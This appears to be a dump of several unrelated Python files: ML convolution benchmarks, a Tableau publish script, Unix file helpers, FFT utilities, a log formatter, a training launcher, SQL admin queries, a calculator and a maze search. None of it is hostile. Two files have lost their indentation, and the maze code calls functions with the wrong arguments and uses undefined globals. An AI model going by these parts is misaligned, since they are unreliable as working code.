    return convolved.cpu().numpy()[0].transpose([2, 1, 0])
if __name__ == "__main__":
    import matplotlib.pyplot as plt
    import datetime
    import time
    # Allow TF to grow GPU memory on demand instead of grabbing it all.
    gpus = tf.config.experimental.list_physical_devices('GPU')
    for gpu in gpus:
        tf.config.experimental.set_memory_growth(gpu, True)
    def plot_image(image):
        # Show the three channels of an (H, W, 3) image side by side.
        fig, ax = plt.subplots(nrows=1, ncols=3)
        ax[0].imshow(image[..., 0])
        ax[1].imshow(image[..., 1])
        ax[2].imshow(image[..., 2])
        plt.show()
    # g1 = makeGaussian(21, 1)
    # g2 = makeGaussian(21, 2)
    # g3 = makeGaussian(21, 1, (3, 3))
    # Build a 3-channel test image out of circular masks.
    g1 = createCircularMask(21, 21, radius=4)
    g2 = createCircularMask(21, 21, radius=5)
    g3 = createCircularMask(21, 21, [3, 3], radius=3)
    gauss_image = np.stack([g1, g2, g3], axis=-1)
    plot_image(gauss_image)
    gauss_kernel = np.stack([makeGaussian(5, 1)] * 3, axis=-1)
    plot_image(gauss_kernel)
    # Sanity check: TF and torch depthwise convolutions should agree.
    tf_convolved = cnn2d_depthwise_tf(gauss_image,
                                      check_shape_kernel(gauss_kernel,
                                                         gauss_image))
    plot_image(tf_convolved)
    torch_convolved = cnn2d_depthwise_torch(gauss_image,
                                            check_shape_kernel(gauss_kernel,
                                                               gauss_image))
    plot_image(torch_convolved)
    print('difference between pytorch and tf ',
          np.mean(tf_convolved - torch_convolved))
    # Benchmark all four convolution paths over many iterations.
    iters = 100000
    start_time = time.time()
    for i in range(iters):
        tf_convolved = cnn2d_tf(gauss_image,
                                check_shape_kernel(gauss_kernel,
                                                   gauss_image))
    time_usage = str(datetime.timedelta(
        seconds=int(round(time.time() - start_time))))
    print("Time usage conv2d TF2: " + time_usage, flush=True)
    start_time = time.time()
    for i in range(iters):
        torch_convolved = cnn2d_torch(gauss_image,
                                      check_shape_kernel(gauss_kernel,
                                                         gauss_image))
    time_usage = str(datetime.timedelta(
        seconds=int(round(time.time() - start_time))))
    print("Time usage conv2d Torch: " + time_usage, flush=True)
    start_time = time.time()
    for i in range(iters):
        tf_convolved = cnn2d_depthwise_tf(gauss_image,
                                          check_shape_kernel(gauss_kernel,
                                                             gauss_image))
    time_usage = str(datetime.timedelta(
        seconds=int(round(time.time() - start_time))))
    print("Time usage depth_wise_conv2d TF2: " + time_usage, flush=True)
    start_time = time.time()
    for i in range(iters):
        torch_convolved = cnn2d_depthwise_torch(gauss_image,
                                                check_shape_kernel(gauss_kernel,
                                                                   gauss_image))
    time_usage = str(datetime.timedelta(
        seconds=int(round(time.time() - start_time))))
    print("Time usage depth_wise_conv2d Torch: " + time_usage, flush=True)
    # Recorded results from a previous run, kept for reference:
    # With @tf.function
    # Time usage conv2d TF2: 0:00:21
    # Time usage conv2d Torch: 0:00:14
    # Time usage depth_wise_conv2d TF2: 0:00:17
    # Time usage depth_wise_conv2d Torch: 0:00:10
    # No @ tf function
    # Time usage conv2d TF2: 0:00:24
    # Time usage conv2d Torch: 0:00:14
    # Time usage depth_wise_conv2d TF2: 0:00:32
    # Time usage depth_wise_conv2d Torch: 0:00:10
####
# This script demonstrates how to use the Tableau Server API
# to publish a workbook to a Tableau server. It will publish
# a specified workbook to the 'default' project of the given server.
#
# Note: The REST API publish process cannot automatically include
# extracts or other resources that the workbook uses. Therefore,
# a .twb file with data from a local computer cannot be published,
# unless packaged into a .twbx file.
#
# For more information, refer to the documentation on 'Publish Workbook'
# (https://onlinehelp.tableau.com/current/api/rest_api/en-us/help.htm)
#
# To run the script, you must have installed Python 2.7.9 or later.
####
import tableauserverclient as TSC
import argparse
import getpass
import logging
# Command-line interface: server address, username and workbook path are
# required; the password is prompted for so it never lands in shell history.
parser = argparse.ArgumentParser(description='Publish a workbook to server.')
parser.add_argument('--server', '-s', required=True, help='server address')
parser.add_argument('--username', '-u', required=True, help='username to sign into server')
parser.add_argument('--filepath', '-f', required=True, help='filepath to the workbook to publish')
parser.add_argument('--logging-level', '-l', choices=['debug', 'info', 'error'], default='error',
                    help='desired logging level (set to error by default)')
args = parser.parse_args()
password = getpass.getpass("Password: ")
# Set logging level based on user input, or error by default
logging_level = getattr(logging, args.logging_level.upper())
logging.basicConfig(level=logging_level)
# Step 1: Sign in to server.
tableau_auth = TSC.TableauAuth(args.username, password)
server = TSC.Server(args.server)
with server.auth.sign_in(tableau_auth):
    # Step 2: Get all the projects on server, then look for the default one.
    pagination_info, all_projects = server.projects.get()
    default_project = next((project for project in all_projects if project.is_default()), None)
    # Step 3: If default project is found, form a new workbook item and publish.
    if default_project is not None:
        new_workbook = TSC.WorkbookItem(default_project.id)
        # Overwrite mode replaces any existing workbook with the same name.
        new_workbook = server.workbooks.publish(new_workbook, args.filepath, server.PublishMode.Overwrite)
        print("Workbook published. ID: {0}".format(new_workbook.id))
    else:
        error = "The default project could not be found."
        raise LookupError(error)
|
"""
Unix functions wrapped in Python
"""
import os
import random
import shutil
import socket
import time
from seisflows.tools.tools import iterable
def cat(src, *dst):
    """
    Concatenate files and print on standard output

    :type src: str
    :param src: path of the file to read
    :type dst: str
    :param dst: optional destination path(s); when given, the contents of
        src are written to each destination instead of printed

    Note: fixes a bug where the whole varargs tuple was passed to open(),
    raising TypeError whenever a destination was supplied.
    """
    with open(src, 'r') as f:
        contents = f.read()
    if not dst:
        print(contents)
    else:
        for path in dst:
            with open(path, 'w') as f:
                f.write(contents)
def cd(path):
    """
    Change directory

    :type path: str
    :param path: directory to change the working directory to
    """
    os.chdir(path)
def cp(src='', dst=''):
    """
    Copy files

    :type src: str or list or tuple
    :param src: source to copy from
    :type dst: str
    :param dst: destination to copy to
    """
    # Multiple sources: dst must be a directory; copy each source into it.
    if isinstance(src, (list, tuple)):
        if len(src) > 1:
            assert os.path.isdir(dst), "unexpected type for unix.cp 'dst'"
        for sub in src:
            cp(sub, dst)
        return
    # Copying into a directory targets a same-named entry inside it.
    if os.path.isdir(dst):
        dst = os.path.join(dst, os.path.basename(src))
    # If that entry is itself an existing directory, copy contents item-wise.
    if os.path.isdir(dst):
        for sub in ls(src):
            cp(os.path.join(src, sub), dst)
        return
    if os.path.isfile(src):
        shutil.copy(src, dst)
    elif os.path.isdir(src):
        shutil.copytree(src, dst)
def hostname():
    """
    Check the hostname

    Returns the machine's short hostname (text before the first '.').
    """
    return socket.gethostname().split('.')[0]
def ln(src, dst):
    """
    Make a symbolic link

    If dst is a directory, a link to each item in src is created inside it;
    otherwise a single link named dst is created pointing at src.
    """
    dst = os.path.abspath(dst)
    if os.path.isdir(dst):
        for name in iterable(src):
            target = os.path.abspath(name)
            link_name = os.path.join(dst, os.path.basename(name))
            os.symlink(target, link_name)
    else:
        os.symlink(src, dst)
def ls(path):
    """
    List directory contents, excluding hidden entries

    :type path: str
    :param path: directory to list

    Note: fixes a bug where hidden names were removed from the list while
    iterating over it, which skipped every second consecutive hidden entry.
    """
    return [name for name in os.listdir(path) if not name.startswith('.')]
def mkdir(dirs):
    """
    Make directory

    Note: Random wait times to prevent overloading disk

    :type dirs: str or list
    :param dirs: pathnames to make
    """
    # Stagger concurrent callers by up to 2 seconds.
    time.sleep(2 * random.random())
    for pathname in iterable(dirs):
        if os.path.isdir(pathname):
            continue
        os.makedirs(pathname)
def mv(src='', dst=''):
    """
    Move contents

    :type src: str or list or tuple
    :param src: source path(s) to move
    :type dst: str
    :param dst: destination to move to
    """
    # Multiple sources: dst must be a directory; move each source into it.
    if isinstance(src, (list, tuple)):
        if len(src) > 1:
            assert os.path.isdir(dst), "unexpected type for 'dst' in unix.mv"
        for item in src:
            mv(item, dst)
        return
    # Moving into a directory targets a same-named entry inside it.
    if os.path.isdir(dst):
        dst = os.path.join(dst, os.path.basename(src))
    shutil.move(src, dst)
def rename(old, new, names):
    """
    Rename multiple files by replacing a substring in their paths

    :type old: str
    :param old: expression to replace
    :type new: str
    :param new: replacement expression
    :type names: list
    :param names: files to replace expressions in
    """
    for path in iterable(names):
        if old in path:
            os.rename(path, path.replace(old, new))
def rm(path=''):
    """
    Remove files or directories

    :type path: str or list
    :param path: path(s) to remove
    """
    for name in iterable(path):
        # Regular files and symlinks are unlinked; directories are removed
        # recursively.
        if os.path.isfile(name) or os.path.islink(name):
            os.remove(name)
        elif os.path.isdir(name):
            shutil.rmtree(name)
def select(items, prompt=''):
    """Have the user pick one entry from a numbered list of items.

    Loops until a valid 1-based selection is entered and returns the chosen
    item.

    NOTE(review): the previous docstring described select(2)-style file
    descriptor monitoring, which this function does not do -- it is an
    interactive menu loop.

    :type items: list
    :param items: options to choose from
    :type prompt: str
    :param prompt: optional text printed before the menu
    """
    while True:
        if prompt:
            print(prompt)
        for i, item in enumerate(items):
            print(f"{i+1:2d}) {item}")
        try:
            reply = int(input().strip())
            status = (1 <= reply <= len(items))
        except (ValueError, TypeError, OverflowError):
            # Non-numeric or out-of-range input: re-show the menu.
            status = 0
        if status:
            return items[reply - 1]
def touch(filename, times=None):
    """
    Update timestamps on files, creating the file if it does not exist

    :type filename: str
    :param filename: file to touch
    :type times: None or (atime, mtime)
    :param times: if None, set time to current time, otherwise
        (accesstime, modifiedtime) need to be set
    """
    # Opening in append mode creates the file without truncating it.
    handle = open(filename, 'a')
    try:
        os.utime(filename, times)
    finally:
        handle.close()
def which(name):
    """
    Shows the full path of shell commands

    :type name: str
    :param name: name of shell command to check

    Returns the resolved path of the executable, or None when not found.

    Note: fixes a bug where a name containing a directory component that was
    not executable fell through into the PATH search instead of returning
    None (matching standard which semantics).
    """
    def isexe(file):
        # executable means: a regular file with the execute bit for us
        return os.path.isfile(file) and os.access(file, os.X_OK)
    dirname, filename = os.path.split(name)
    if dirname:
        # An explicit directory component: only that location is checked.
        return name if isexe(name) else None
    for path in os.environ["PATH"].split(os.pathsep):
        path = path.strip('"')
        fullname = os.path.join(path, name)
        if isexe(fullname):
            return fullname
    return None
|
import numpy as np
import tensorflow as tf
def split_reim(array):
    """Split a complex valued matrix into its real and imaginary parts.

    Args:
        array(complex): An array of shape (batch_size, N, N) or (batch_size, N, N, 1)

    Returns:
        split_array(float): An array of shape (batch_size, N, N, 2) with the
        real part on channel 0 and the imaginary part on channel 1
    """
    real_part = np.real(array)
    imag_part = np.imag(array)
    return np.stack((real_part, imag_part), axis=3)
def split_reim_tensor(array):
    """Split a complex valued tensor into its real and imaginary parts.

    Args:
        array(complex): A tensor of shape (batch_size, N, N) or (batch_size, N, N, 1)

    Returns:
        split_array(float): A tensor of shape (batch_size, N, N, 2) with the
        real part on channel 0 and the imaginary part on channel 1.
    """
    # tf.stack inserts the new channel axis at position 3.
    return tf.stack((tf.math.real(array), tf.math.imag(array)), axis=3)
def split_reim_channels(array):
    """Split a complex valued tensor into real and imaginary channel groups.

    Args:
        array(complex): A tensor of shape (batch_size, N, N, ch)

    Returns:
        split_array(float): A tensor of shape (batch_size, N, N, 2*ch) with
        the real channels first, followed by the imaginary channels.
    """
    real = tf.math.real(array)
    imag = tf.math.imag(array)
    # Concatenate (not stack) so the rank stays 4: the channel axis doubles.
    # Fix: removed the unused `n_ch` local; the docstring now matches the
    # concat behaviour (the old one described a stacked (.., 2) output).
    split_array = tf.concat((real, imag), axis=3)
    return split_array
def join_reim(array):
    """Join the real and imaginary channels of a matrix to a single complex-valued matrix.

    Args:
        array(float): An array of shape (batch_size, N, N, 2)

    Returns:
        joined_array(complex): A complex-valued array of shape
        (batch_size, N, N). Fix: the old docstring claimed an extra
        trailing axis of size 1, but indexing consumes the channel axis.
    """
    # Channel 0 holds the real part, channel 1 the imaginary part.
    joined_array = array[:, :, :, 0] + 1j * array[:, :, :, 1]
    return joined_array
def join_reim_tensor(array):
    """Join the real and imaginary channels of a matrix to a single complex-valued matrix.

    Args:
        array(float): An array of shape (batch_size, N, N, 2)

    Returns:
        joined_array(complex): A complex-valued array of shape (batch_size, N, N)
    """
    real_part = tf.cast(array[:, :, :, 0], 'complex64')
    imag_part = tf.cast(array[:, :, :, 1], 'complex64')
    return real_part + 1j * imag_part
def join_reim_channels(array):
    """Join the real and imaginary channels of a matrix to a single complex-valued matrix.

    Args:
        array(float): An array of shape (batch_size, N, N, ch)

    Returns:
        joined_array(complex): A complex-valued array of shape (batch_size, N, N, ch/2)
    """
    # The first half of the channels are real parts, the second half imaginary.
    n_channels = array.get_shape().as_list()[3]
    half = int(n_channels / 2)
    real_part = tf.cast(array[:, :, :, :half], dtype=tf.complex64)
    imag_part = tf.cast(array[:, :, :, half:], dtype=tf.complex64)
    return real_part + 1j * imag_part
def convert_to_frequency_domain(images):
    """Convert an array of images to their Fourier transforms.

    Args:
        images(float): An array of shape (batch_size, N, N, 2)

    Returns:
        spectra(float): An FFT-ed array of shape (batch_size, N, N, 2)
    """
    # FFT over the two spatial axes; the batch axis 0 is untouched.
    # Fix: removed the unused local `n`.
    spectra = split_reim(np.fft.fft2(join_reim(images), axes=(1, 2)))
    return spectra
def convert_tensor_to_frequency_domain(images):
    """Convert a tensor of images to their Fourier transforms.

    Args:
        images(float): A tensor of shape (batch_size, N, N, 2)

    Returns:
        spectra(float): An FFT-ed tensor of shape (batch_size, N, N, 2)
    """
    # tf.signal.fft2d transforms the innermost two axes, which after
    # join_reim_tensor are the spatial ones. Fix: removed unused local `n`.
    spectra = split_reim_tensor(tf.signal.fft2d(join_reim_tensor(images)))
    return spectra
def convert_to_image_domain(spectra):
    """Convert an array of Fourier spectra to the corresponding images.

    Args:
        spectra(float): An array of shape (batch_size, N, N, 2)

    Returns:
        images(float): An IFFT-ed array of shape (batch_size, N, N, 2)
    """
    # Inverse FFT over the two spatial axes. Fix: removed unused local `n`.
    images = split_reim(np.fft.ifft2(join_reim(spectra), axes=(1, 2)))
    return images
def convert_tensor_to_image_domain(spectra):
    """Convert a tensor of Fourier spectra to the corresponding images.

    Args:
        spectra(float): A tensor of shape (batch_size, N, N, 2)

    Returns:
        images(float): An IFFT-ed tensor of shape (batch_size, N, N, 2)
    """
    # Inverse of convert_tensor_to_frequency_domain. Fix: removed unused `n`.
    images = split_reim_tensor(tf.signal.ifft2d(join_reim_tensor(spectra)))
    return images
|
#!/usr/bin/env python
import os
import string
import sys
sys.path.insert(0, "../../../util/python")
import Util
fn_in = None
fn_out = None
class ReadCnt:
    """Per-SSTable read counters derived from raw (reads, bloom fp, bloom tp).

    Derived fields: bf_n = reads not matched by the bloom filter at all,
    reads_miss = reads that did not hit (reads minus true positives).
    """
    def __init__(self, r, fp, tp):
        self.reads = r
        self.bf_fp = fp
        self.bf_tp = tp
        self.bf_n = r - fp - tp
        self.reads_miss = r - tp
    def __str__(self):
        # Fixed-width columns matching the output table written by the caller.
        return "%8d %4d %7d %8d %8d" % (self.reads, self.bf_fp, self.bf_tp, self.bf_n, self.reads_miss)
    def __add__(self, r):
        # Derived fields are recomputed by the constructor.
        return ReadCnt(self.reads + r.reads,
                       self.bf_fp + r.bf_fp,
                       self.bf_tp + r.bf_tp)
    def __sub__(self, r):
        return ReadCnt(self.reads - r.reads,
                       self.bf_fp - r.bf_fp,
                       self.bf_tp - r.bf_tp)
def ReadInputAndGenFormattedFile():
    """Parse the last data line of fn_in and write a per-sstable table to fn_out.

    The input's final non-comment line looks like:
        <date> <time-with-comma-decimal> <gen>:<reads>,<bf_fp>,<bf_tp> ...
    Each gen field becomes one ReadCnt row in the output file.

    NOTE(review): Python 2 only — uses string.replace(), dict.iteritems()
    and a print statement.
    """
    global fn_in
    last_line = None
    with open(fn_in) as fo:
        # Keep only the last non-empty, non-comment line of the file.
        for line in fo.readlines():
            # print line
            if len(line) == 0:
                continue
            if line[0] == "#":
                continue
            last_line = line
    if last_line == None:
        raise RuntimeError("Can't find the last line")
    time = None
    sst_readcnt = {}
    t = last_line.split()
    #print len(t)
    for i in range(len(t)):
        if i == 0:
            # First token: the date part of the timestamp.
            time = t[i]
            continue
        elif i == 1:
            # replace decimal point , with .
            time += ("-" + string.replace(t[i], ",", "."))
            continue
        # Remaining tokens: "<sstable_gen>:<reads>,<bf_fp>,<bf_tp>".
        t2 = t[i].split(":")
        if len(t2) != 2:
            raise RuntimeError("Unexpected format: [%s] [%s]" % (last_line, t2))
        sstable_gen = int(t2[0])
        t3 = t2[1].split(",")
        if len(t3) != 3:
            raise RuntimeError("Unexpected format: [%s] [%s]" % (last_line, t2))
        read_cnt = int(t3[0])
        bf_fp_cnt = int(t3[1])
        bf_tp_cnt = int(t3[2])
        sst_readcnt[sstable_gen] = ReadCnt(read_cnt, bf_fp_cnt, bf_tp_cnt)
    with open(fn_out, "w") as fo:
        fo.write("# time: %s\n" % time)
        fo.write("#\n")
        fmt = "%2d %8d %4d %7d %8d %8d"
        header = Util.BuildHeader(fmt, "sstable_gen read_cnt bf_fp_cnt bf_tp_cnt(read_hit) bf_n_cnt read_miss")
        fo.write(header)
        # ReadCnt.__str__ renders the five count columns; rows sorted by gen.
        for k, v in sorted(sst_readcnt.iteritems()):
            fo.write("%2d %s\n" % (k, v))
    print "Created file %s %d" % (fn_out, os.path.getsize(fn_out))
def main(argv):
    """Entry point: validate argv, derive the output filename, run the formatter."""
    if len(argv) != 2:
        print "Usage: %s fn_in" % (argv[0])
        sys.exit(1)
    global fn_in
    global fn_out
    fn_in = argv[1]
    # Output file sits next to the input with a fixed suffix.
    fn_out = fn_in + "-by-sstables"
    ReadInputAndGenFormattedFile()
if __name__ == "__main__":
    sys.exit(main(sys.argv))
|
"""Main.
The main script that is called to run everything else.
Author:
Yvan Satyawan <y_satyawan@hotmail.com>
"""
from platform import system
from trainer import Trainer
from utils.slacker import Slacker
from os import getcwd
from os.path import join
import warnings
import traceback
try:
import curses
except ImportError:
if system() == "Windows":
pass
else:
warnings.warn("Running on a non-Windows OS without curses. Command line"
" usage will not be possible.",
ImportWarning)
def run_training(arguments, iaa, silence=False):
    """Main function that runs everything.

    Args:
        arguments (dict): The arguments given by the user. Keys read here:
            "cmd_line", "train", "validate", "infer", "learning_rate",
            "optimizer", "loss_weights", "criterion", "network",
            "pretrained", "px_coordinates", "batch_size", "epochs",
            "plot", "weights", "augment".
        iaa: Augmentation object passed straight through to Trainer —
            presumably an imgaug pipeline; TODO confirm against Trainer.
        silence (bool): Additional argument used only by batch_train to allow
            for silent running, i.e. it doesn't require the user to type
            anything to move to the next training session. Defaults to False.
    """
    # Get the curses window ready by setting it to None
    stdscr = None
    try:
        if arguments["cmd_line"]:
            stdscr = curses.initscr()
            curses.noecho()
            curses.cbreak()
            try:
                curses.curs_set(0)
            # NOTE(review): bare except — hides cursor only where the
            # terminal supports it, but also swallows KeyboardInterrupt;
            # `except curses.error` would be safer.
            except:
                pass
        # Get the trainer object ready
        if arguments["train"]:
            # Run in training mode
            trainer = Trainer(iaa, arguments["learning_rate"],
                              arguments['optimizer'],
                              arguments['loss_weights'],
                              stdscr,
                              loss_criterion=arguments['criterion'])
            trainer.set_network(arguments['network'], arguments['pretrained'],
                                arguments['px_coordinates'])
            data = arguments['train']
        elif arguments['validate']:
            # Run for validation
            trainer = Trainer(iaa, cmd_line=stdscr,
                              validation=arguments['validate'],
                              loss_criterion=arguments['criterion'])
            trainer.set_network(arguments['network'], arguments['pretrained'],
                                arguments['px_coordinates'])
            data = arguments['validate']
        elif arguments['infer']:
            raise NotImplementedError("Inference is not yet implemented.")
        else:
            raise ValueError("Must run in one of the possible modes.")
        # Run training or validation
        if arguments['train'] or arguments['validate']:
            trainer.train(data, arguments['batch_size'],
                          arguments['epochs'], arguments['plot'],
                          arguments['weights'], arguments['augment'],
                          silent=silence)
    finally:
        # Always restore the terminal, then report any pending exception.
        if stdscr is not None:
            stdscr.clear()
            curses.echo()
            curses.nocbreak()
            try:
                curses.curs_set(1)
            # NOTE(review): same bare-except caveat as above.
            except:
                pass
            curses.endwin()
        # format_exc(0) yields "None\n" when no exception is active; the
        # "None" check below relies on that, but would also match any
        # exception message containing the word "None" — TODO confirm.
        exception_encountered = traceback.format_exc(0)
        if "SystemExit" in exception_encountered \
                or "KeyboardInterrupt" in exception_encountered \
                or "None" in exception_encountered:
            return
        else:
            # Unexpected failure: log locally and push the trace to Slack.
            print("I Died")
            print(exception_encountered)
            Slacker.send_code("Exception encountered", exception_encountered)
            with open(join(getcwd(), "traceback.txt"), mode="w") as file:
                traceback.print_exc(file=file)
            return
|
class PriceInfo(object):
    """Snapshot of an item's price trends plus an optional OSBuddy quote."""

    def __init__(self, curr_trend, trend_today, trend_30, trend_90, trend_180, osbuddy_price):
        # Trend objects for the current moment and several look-back windows.
        self.curr_trend = curr_trend
        self.trend_today = trend_today
        self.trend_30 = trend_30
        self.trend_90 = trend_90
        self.trend_180 = trend_180
        self.osbuddy_price = osbuddy_price

    def price(self):
        """Return the OSBuddy price when truthy, else the current trend's price."""
        return self.osbuddy_price if self.osbuddy_price else self.curr_trend.price
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Runs the Microsoft Message Compiler (mc.exe). This Python adapter is for the
# GN build, which can only run Python and not native binaries.
#
# Usage: message_compiler.py <environment_file> [<args to mc.exe>*]
import subprocess
import sys
# Read the environment block from the file. This is stored in the format used
# by CreateProcess. Drop last 2 NULs, one for list terminator, one for trailing
# vs. separator.
env_pairs = open(sys.argv[1]).read()[:-2].split('\0')
env_dict = dict([item.split('=', 1) for item in env_pairs])
# mc writes to stderr, so this explicitly redirects to stdout and eats it.
try:
# This needs shell=True to search the path in env_dict for the mc executable.
subprocess.check_output(["mc.exe"] + sys.argv[2:],
env=env_dict,
stderr=subprocess.STDOUT,
shell=True)
except subprocess.CalledProcessError as e:
print e.output
sys.exit(e.returncode)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 6 16:02:49 2019
@author: KuroAzai
"""
import Calculator
def LessThanSix(calc,ops):
    """Evaluate a single binary expression given as [lhs, op, rhs].

    Args:
        calc: list like [number, operator, number]
        ops: operator symbols in the fixed order ['+', '-', '*', '/']

    Returns:
        The computed value, or None when the operator is unrecognised.
        Fix: `result` was previously unbound on the unknown-operator path,
        so `return result` raised UnboundLocalError.
    """
    result = None
    print(calc[1])
    if calc[1] == ops[0]:
        result = Calculator.Addition(calc[0],calc[2])
        print("Add" , result)
    elif calc[1] == ops[1]:
        result = Calculator.Subtraction(calc[0],calc[2])
        print("Sub" , result )
    elif calc[1] == ops[2]:
        result = Calculator.Multiplication(calc[0],calc[2])
        print("Mult" , result)
    elif calc[1] == ops[3]:
        result = Calculator.Division(calc[0],calc[2])
        print("Div" , result)
    else:
        print("404 Jutsu Not found nani ")
    return result
def GreaterThanSix(calc):
    """Intended handler for longer expressions.

    NOTE(review): not implemented — always returns None; `calculate`
    handles the long case itself and never calls this.
    """
    pass
def calculate(calc):
    """Evaluate a flat expression list like [5, '*', 10, '+', 15] left-to-right.

    Operators sit at odd indices, operands at even indices. Evaluation is
    strictly left-to-right — there is NO operator precedence. Delegates to
    LessThanSix for a single binary expression (len < 5).

    NOTE(review): the 0.43 heuristic for counting operators only works for
    well-formed alternating lists; len(calc) // 2 would be exact.
    """
    ops = ['+','-','*','/']
    # Using 0.429/ 0.43 we can find the number of operators that are within our list
    print("Number of operators" , round(len(calc) * 0.43))
    size = round(len(calc) * 0.43)
    print(size)
    #Step 1
    '''
    Setting a variable that we will iterate over our Operators in our list.
    our operators will always be even numbers and our numbers will be odd numbers.
    so will be incremented by + 2 but for the initial operator is at index 1(2 - 1).
    '''
    n = 3
    #Initialise a vairable to store our result
    result = 0
    step = 0
    #Parameters for our Numbers
    '''
    Our numbers will be on odd numbers(1,3,5...) .
    our intial step will calculate the first 2 values then add the next value.
    calc = [5,'*',10, '+', 15, '+' ,20, '+', 25]
    With the above example after step one the 5th element will be added.
    so our Y variable will be 5 - 1 = 4 . Then we will the increment to increase it by +2
    '''
    y = 4
    print(len(calc))
    if len(calc) < 5 :
        print("less than")
        return LessThanSix(calc,ops)
    #return "potato"
    while size > 0:
        print("\nStep", step)
        #STEP 1 conditions
        # First step consumes calc[0] op calc[2]; later steps fold calc[y]
        # into the running result using the operator at calc[n].
        if step == 0 :
            if calc[1] == ops[0]:
                result = Calculator.Addition(calc[0],calc[2])
                print("Add" , result, calc[y])
            elif calc[1] == ops[1]:
                result = Calculator.Subtraction(calc[0],calc[2])
                print("Sub" , result )
            elif calc[1] == ops[2]:
                result = Calculator.Multiplication(calc[0],calc[2])
                print("Mult" , result)
            elif calc[1] == ops[3]:
                result = Calculator.Division(calc[0],calc[2])
                print("Div" , result)
            else:
                print("404 Jutsu Not found nani ", calc[n])
        else:
            if calc[n] == ops[0]:
                result = Calculator.Addition(result,calc[y])
                print("Add", result , calc[y])
            elif calc[n] == ops[1] :
                result = Calculator.Subtraction(result,calc[y])
                print("Sub", result )
            elif calc[n] == ops[2] :
                result = Calculator.Multiplication(result,calc[y])
                print("Mult", result)
            elif calc[n] == ops[3] :
                result = Calculator.Division(result,calc[y])
                print("Div", result)
            else:
                print("404 Jutsu Not found what", calc[n], "n =", n )
        # Advance to the next operator/operand pair.
        y += 2
        n += 2
        size -= 1
        step += 1
    return result
|
from sql_helper import MySqlHelper
class Admin(object):
    """Database access helpers for the admin console (servers, users, audit log)."""

    def __init__(self):
        # One MySQL helper instance shared by every query on this object.
        self.__helper = MySqlHelper()

    def get_table_servers(self):
        """Return all rows of the servers table."""
        sql = "select * from servers"
        return self.__helper.Get_Dict(sql, None)

    def get_table_users(self):
        """Return all rows of the users table."""
        sql = "select * from users"
        return self.__helper.Get_Dict(sql, None)

    def get_user_id(self, username):
        """Look up a user's id in the users table by name."""
        sql = "select users.id from users where users.name=%s"
        return self.__helper.Get_One(sql, (username,))

    def get_user_servers(self, userid):
        """Many-to-many join: which servers the given user may log in to."""
        sql = "select users.name,servers.server_ip from action_list,servers,users where users.id=action_list.user_id and servers.id=action_list.server_id and users.id=%s"
        return self.__helper.Get_Dict(sql, (userid,))

    def insert_record(self, r_name, r_time, r_ip, r_log):
        """Persist one audit record of the commands a user ran on a server."""
        sql = 'insert into record(name,time,ip,log) values(%s,%s,%s,%s)'
        self.__helper.Insert_one(sql, (r_name, r_time, r_ip, r_log))
|
# Load the maze as a grid: one list of cell characters per line, with the
# trailing newline stripped. Fix: the original `list(linea)[-1]` kept only
# the LAST character of each line (usually the newline), which broke every
# 2-D index (matriz[x][y]) used by the verificar* functions below. Also
# close the file instead of leaking the handle.
with open("Laberinto.txt") as _maze_file:
    matriz = [list(linea.rstrip("\n")) for linea in _maze_file.readlines()]
class Nodo():
    """Maze-search tree node: a cell value, its (row, col) position, and children."""
    def __init__(self,valor,posicion,hijos=None):
        self.valor=valor
        self.posicion = posicion
        # Fix: the previous default `hijos=[]` was one shared list, so every
        # node created without an explicit list shared its children.
        self.hijos = [] if hijos is None else hijos
    def agregarHijo(self,hijo):
        """Append one child node."""
        self.hijos.append(hijo)
    def setPosicion(self,posicion):
        self.posicion=posicion
    def setHijos(self,hijos):
        self.hijos=hijos
def buscar(arbol,posicion):
    """Return True when `posicion` occurs anywhere in the tree rooted at `arbol`."""
    if arbol is None:
        return False
    # Match at this node, or search each child subtree.
    return arbol.posicion == posicion or buscar_hijos(arbol.hijos, posicion)
def buscar_hijos(hijos,posicion):
    """Return True when any subtree in `hijos` contains `posicion`."""
    # Short-circuits on the first subtree that contains the position,
    # matching the original head/tail recursion order.
    return any(buscar(subtree, posicion) for subtree in hijos)
def buscarValor(arbol,valor):
    """Return True when a node with value `valor` occurs in the tree `arbol`."""
    if arbol is None:
        return False
    # Match at this node, or search each child subtree.
    return arbol.valor == valor or buscar_hijosValor(arbol.hijos, valor)
def buscar_hijosValor(hijos,valor):
    """Return True when any subtree in `hijos` contains a node valued `valor`."""
    # Short-circuits on the first matching subtree, like the original recursion.
    return any(buscarValor(subtree, valor) for subtree in hijos)
def imprimir(arbol):
    """Print the positions of a tree in pre-order; prints "None" for an empty tree."""
    if arbol is None:
        print("None")
        return
    print(arbol.posicion)
    # Iterating an empty child list is a no-op, matching the original
    # explicit len() guard.
    for hijo in arbol.hijos:
        imprimir(hijo)
def buscarX(laberinto):
    """Find the 'x' start cell in the maze and build the search tree from it.

    NOTE(review): calls colocarArbol with four arguments, but colocarArbol
    is defined with only (x, y) — this raises TypeError as written; the
    intended signature needs to be confirmed.
    NOTE(review): laberinto.index(x) returns the index of the FIRST row
    equal to x, which is wrong when two rows have identical contents —
    enumerate() would give the real row number.
    """
    for x in laberinto:
        for y in range(len(x)):
            if x[y] == "x":
                colocarArbol(laberinto.index(x),y,laberinto, Nodo(0,0,[]))
def colocarArbol(x,y):
    """Anchor the search tree at cell (x, y) and expand in all four directions.

    NOTE(review): `raiz` and `arbol` are globals that are never defined in
    this file, so calling this raises NameError; buscarX also passes four
    arguments to this two-parameter function. The wiring between buscarX,
    colocarArbol and the verificar* helpers needs to be confirmed.
    """
    raiz.setPosicion((x,y))
    arbol.setPosicion((x,y))
    raiz.setHijos([verificarIzquierda(x,y,arbol),verificarAbajo(x,y,arbol),verificarArriba(x,y,arbol),verificarDerecha(x,y,arbol)])
def verificarDerecha(x,y,nodo):
    """Try to expand the search tree one cell to the right of (x, y).

    Returns a new Nodo whose children are the recursive expansions, or None
    when out of bounds, blocked, or already visited (tracked by mutating
    `nodo`'s child list).

    NOTE(review): matriz holds characters read from a text file, so the
    wall test `!= 1` compares str to int and is always True — it probably
    should be `!= "1"`; confirm the wall encoding in Laberinto.txt.
    """
    print((x,y),"→")
    if(y+1<=len(matriz[x])-1 and matriz[x][y+1]!=1):
        # The agregarHijo call marks (x, y+1) visited BEFORE the recursive
        # expansions in the list below run — the order is load-bearing.
        if(buscar(nodo,(x,y+1))!=True):
            nodo.agregarHijo(Nodo(matriz[x][y+1],(x,y+1),[]))
